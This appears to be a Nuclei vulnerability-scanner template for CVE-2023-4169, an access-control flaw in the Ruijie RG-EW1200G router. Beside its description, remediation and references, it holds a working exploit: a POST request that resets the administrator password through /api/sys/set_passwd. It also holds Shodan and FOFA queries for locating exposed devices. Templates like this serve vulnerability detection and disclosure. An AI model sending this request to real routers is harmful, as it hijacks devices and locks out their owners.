id: CVE-2023-4169

info:
  name: Ruijie RG-EW1200G Router - Password Reset
  author: DhiyaneshDK
  severity: high
  description: |
    A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.
  impact: |
    Authenticated low-privilege attackers can reset the administrator password through /api/sys/set_passwd endpoint due to improper access controls, allowing complete takeover of the Ruijie RG-EW1200G router.
  remediation: |
    Update Ruijie RG-EW1200G firmware to a version newer than 1.0(1)B1P5 that implements proper authorization checks requiring administrator privileges for password reset operations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4169
    - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G
    - https://vuldb.com/?ctiid.236185
    - https://vuldb.com/?id.236185
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-4169
    cwe-id: CWE-284,NVD-CWE-noinfo
    epss-score: 0.91932
    epss-percentile: 0.99711
    cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ruijie
    product: rg-ew1200g_firmware
    shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
    fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
  tags: cve,cve2023,ruijie,router,intrusive,vkev,vuln
variables:
  password: "{{rand_base(8)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/sys/set_passwd"

    body: |
      {
      "username":"web",
      "admin_new":"{{password}}"
      }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"ok"'

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f300a2317dbfefceca1bbf1bbd08da046957f29ab7fc01d5c029929c0e3669700221009d2b308ba57d70194a9b6ad57d32869cdd30fa048db31c08eb405b99dbe1198a:922c64590222798bb761d5b6d8e72950